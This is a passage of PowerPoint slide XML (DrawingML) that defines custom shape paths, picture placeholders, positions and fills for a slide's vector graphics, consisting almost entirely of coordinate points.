                  <a:lnTo>
                    <a:pt x="341957" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335415" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="383186" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360753" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349252" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368619" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383186" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462536" y="39319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429047" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433579" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439715" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441260" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441260" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434818" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428621" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394953" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394908" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396963" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405900" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406192" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411105" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420330" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422870" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425817" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423805" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421204" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420107" y="79898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419172" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418197" y="78272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417587" y="77419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417100" y="75651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416978" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417567" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462536" y="39319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462798" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441138" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462798" y="62443"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441138" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439431" y="78049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437460" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432659" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432365" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430754" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="62443"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="427605" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422383" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417181" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406777" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403018" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400722" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400722" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402713" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404501" y="43484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407427" y="42509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415335" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415113" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419457" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462536" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460035" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454508" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449727" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443647" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436603" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437440" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427605" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="507278" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485373" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485373" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507278" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507278" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="551046" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529121" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529121" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551046" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5510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42FB6DA3-3573-C6C9-E4B4-F4B3BBBC08DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5352201" y="3008351"/>
              <a:ext cx="1285240" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285240" h="821689">
                  <a:moveTo>
                    <a:pt x="538565" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477538" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456178" y="9111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447024" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436344" y="15186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389048" y="41003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350906" y="74412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344803" y="83524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338701" y="91117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332598" y="100229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328021" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323444" y="116934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317341" y="126046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314290" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308187" y="154900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305136" y="165530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303610" y="174642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300559" y="195903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300559" y="223238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291405" y="224757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280725" y="226276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271571" y="229313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260891" y="232350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253263" y="236906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244108" y="242981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236480" y="247536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212069" y="277909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="314356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198338" y="326505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="332580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="341692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189184" y="338654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176978" y="335617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164773" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154093" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137311" y="335617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93066" y="346247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54924" y="367508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25936" y="397881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6102" y="435847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="463182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10679" y="534558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33564" y="569486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67129" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79335" y="605933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93066" y="610489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106797" y="616564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122054" y="619601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137311" y="621120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154093" y="622638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163247" y="622638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173927" y="621120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173927" y="634787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175453" y="643899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175453" y="653011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178504" y="662123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180030" y="669716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186133" y="687940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190710" y="695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195287" y="704644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224275" y="741092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254788" y="766908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289879" y="786651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329547" y="800318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363112" y="806393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373791" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384471" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396677" y="809430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408882" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421087" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445498" y="804874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457704" y="801837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479063" y="795762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491269" y="792725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500423" y="788169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511103" y="782095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520257" y="777539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529411" y="771464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540091" y="765390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547719" y="759315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556873" y="753241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564501" y="745648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570604" y="753241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578233" y="762353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585861" y="768427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595015" y="776020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604169" y="782095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="789688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624003" y="794244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636208" y="800318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648414" y="804874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660619" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674350" y="812467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701813" y="818542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715544" y="820061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729275" y="820061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744532" y="821579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782674" y="818542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834547" y="806393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880317" y="786651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903203" y="768427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913882" y="759315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935242" y="727424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942870" y="703126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950499" y="704645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956601" y="706163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982538" y="706163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991692" y="704645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002372" y="703126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011526" y="700089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020680" y="695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035937" y="686421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042040" y="678828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049668" y="672753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055771" y="666679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060348" y="659086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063399" y="649974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1067976" y="642381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="633269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="624157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="615045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="602896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069502" y="592266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080182" y="593784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092387" y="595303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103067" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115272" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165620" y="589229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209864" y="571005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255635" y="531521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263263" y="517853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270892" y="505704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276994" y="492036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283097" y="461664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284623" y="446477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283097" y="431291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270892" y="388769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244955" y="350803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209864" y="323468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196133" y="314356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180877" y="308282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165620" y="303726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148837" y="299170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115272" y="296133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104592" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093913" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083233" y="299170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="302207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="262723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="250574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069502" y="239943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066450" y="229313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063399" y="220201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060348" y="209571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051194" y="188310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042040" y="170086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035937" y="160974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029834" y="153381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023731" y="144270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016103" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010000" y="129083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002372" y="121490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994743" y="115416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987115" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968807" y="95673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930665" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868112" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857432" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837598" y="65301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819290" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800982" y="72894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782674" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749109" y="92636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735378" y="103266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720121" y="113897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704864" y="89599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695710" y="78968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686556" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665196" y="48596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652991" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639260" y="30372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625529" y="24298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="18223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598066" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584335" y="7593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569078" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538565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9" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794D9AF4-9FF6-DDED-214B-3A3E9DB5F5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2714" y="3028093"/>
              <a:ext cx="1209864" cy="754759"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5496D0B7-173E-4C33-0DA4-1CF8965525B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3046" y="2999607"/>
              <a:ext cx="1302972" cy="839469"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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87AC9A33-4685-1BF3-44D8-DFC861BB0F2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058986" y="3449270"/>
              <a:ext cx="979805" cy="478155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="478154">
                  <a:moveTo>
                    <a:pt x="638991" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340694" y="477833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979686" y="370472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979686" y="128531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638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5B7A0A43-7353-AF24-F627-19C9B2ED253F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7401195" y="3576289"/>
              <a:ext cx="639445" cy="351155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="639445" h="351154">
                  <a:moveTo>
                    <a:pt x="635963" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="350814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99937" y="332668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319495" y="294865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537540" y="257062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610221" y="244965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629906" y="243453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638991" y="243453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635963" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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3" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FC8EF9-382E-2AD9-D2B0-245C6C2186D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8986" y="3450782"/>
              <a:ext cx="970601" cy="476321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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8ECF9E97-D417-6CD2-46FA-A8D09274477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50658" y="2919097"/>
              <a:ext cx="1400623" cy="1160247"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BEDB3A-C542-B269-7A42-770030B5CBA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49650" y="3053092"/>
              <a:ext cx="443660" cy="491442"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1FD677-C6A0-CAB6-9241-0553C8CD24D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1543" y="3608044"/>
              <a:ext cx="198359" cy="149700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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D3011053-B575-DA39-3403-068712D1284C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7563215" y="3249669"/>
              <a:ext cx="229235" cy="240665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="229234" h="240664">
                  <a:moveTo>
